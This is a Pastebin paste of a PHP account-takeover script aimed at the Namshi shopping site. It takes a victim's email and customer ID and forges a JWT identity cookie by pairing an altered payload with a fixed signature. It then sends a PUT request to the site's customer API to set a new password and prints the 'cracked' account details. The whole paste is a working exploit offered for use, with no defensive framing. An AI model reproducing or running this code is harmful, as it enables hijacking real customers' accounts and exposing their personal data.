Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <center>
- Boooom[Nmshi] by 1377r00t
- <form method="POST" action="">
- Email :<input name="email" type="text"><br>
- Id :<input name="id" type="text" value="يتكون من 7 ارقام"><br>
- New Password : <input name="password" type="text"><br>
- <input type="submit" value="Logged">
- </center>
- </form>
- <?
- $email = $_POST['email'];
- $id = $_POST['id'];
- $password = $_POST['password'];
- $base64 = ('
- {
- "username": "'.$email.'",
- "roles": [
- "ROLE_CUSTOMER",
- "ROLE_CUSTOMER"
- ],
- "customerId": '.$id.',
- "exp": 1497353545,
- "iat": 1492169545
- }');
- $encoded = urlencode($base64);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://my.namshi.com/api/jerry/customers/$id.json");
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_HTTPHEADER, array(
- 'Host: my.namshi.com',
- 'Connection: keep-alive',
- 'Content-Length: 22',
- 'n-tenant: namshi',
- 'Accept: application/json',
- 'Origin: https://my.namshi.com',
- 'n-locale: ar_SA',
- 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36',
- 'Content-type: application/json',
- 'Referer: https://my.namshi.com/password/change',
- 'Accept-Encoding: gzip, deflate',
- 'Accept-Language: ar-AE,en-US;q=0.8',
- 'Cookie: identity=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXUyJ9.'.$encoded.'.K44hBhxQJf6wwwEndEidJmVyOKj-heelzjNujHNnU01D-TERVGgOtl5wMA3Q5297C3WrcxenvY0Kdsd_Dcc4zi5kT3W4j8PhWxpAn79V88_IHbYCS94I4Pc8DmKrJp_aEfcJPNcKmGYvJvCMmHUvRgOo70TPCbg76nX-JEoR3n4; locale-v1=ar_SA',
- 'X-Requested-With: com.namshi.android'
- ));
- curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query('{"password":"'.$password.'"}'));
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- $check = curl_exec($ch);
- ///////////////////////////////////////////
- $startid = explode('{"lastUpdatedPhone":{"id":' , $check );
- $endid = explode(',"number":"' , $startid[1] );
- $iduser = $endid[0];
- ///////////////////////////////////////////
- $startemail = explode(',"email":"' , $check );
- $endemail = explode('","firstName":"' , $startemail[1] );
- $emailuser = $endemail[0];
- ///////////////////////////////////////////
- echo '
- <center>
- <br>
- Cracked :-<br>
- Id : '.$iduser.'<br>
- Email : '.$iduser.'<br>
- Password : '.$password.'<br>
- Good Bye<br>(Twitter:1337r00t)<br>(Instagram:1337r00t)<br>'.$check.'
- </center>
- ';
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement